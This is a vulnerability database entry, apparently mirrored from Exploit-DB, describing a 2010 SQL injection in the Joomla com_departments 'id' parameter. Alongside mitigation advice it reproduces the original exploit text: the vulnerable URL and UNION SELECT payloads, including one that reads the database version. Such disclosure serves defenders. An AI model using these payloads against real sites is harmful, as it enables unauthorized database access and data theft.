Joomla Component com_departments SQL Injection Vulnerability

vendor:

N/A

by:

DevilZ TM

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Joomla Component com_departments SQL Injection Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'id' parameter of the 'com_departments' component. A remote attacker can send a specially crafted request to the vulnerable application and execute arbitrary SQL commands in application's database. This can be exploited to disclose sensitive information, modify data, compromise the application, access or delete data, or exploit latent vulnerabilities in the underlying database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. It is recommended to use parameterized queries (prepared statements) when working with databases.

Source

Exploit-DB raw data:

# Title : Joomla Component com_departments SQL Injection Vulnerability
# Author: DevilZ TM
# Data  : 2010-03-29

[~]######################################### InformatioN #############################################[~]
 
[~] Title     : Joomla Component com_departments SQL Injection Vulnerability
[~] Author    : DevilZ TM By D3v1l
[~] Homepage  : http://www.DEVILZTM.com
[~] Email     : Expl0it@DevilZTM.Com
[~] Contact   : D3v1l.blackhat@yahoo.com
 
[~]#########################################   ExploiT   #############################################[~]
 
[~] Vulnerable File :
 
http://127.0.0.1/index.php?option=com_departments&id=[SQL]
 
[~] ExploiT         :
 
-1 UNION SELECT 1,2,3,4,5,6,7,8--
 
[~] Example         :
 
http://127.0.0.1/index.php?option=com_departments&id=-1 UNION SELECT 1,2,3,4,5,6,7,8--

[~] Demo            :

http://server/index.php?option=com_departments&id=-1 UNION SELECT 1,version(),3,4,5,6,7,8--

  
[~]######################################### ThankS To ... ############################################[~]
 
[~] Special Thanks To My Best FriendS :
 
Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS
 
[~] IRANIAN Young HackerZ
 
[~]#########################################   FinisH :D   #############################################[~]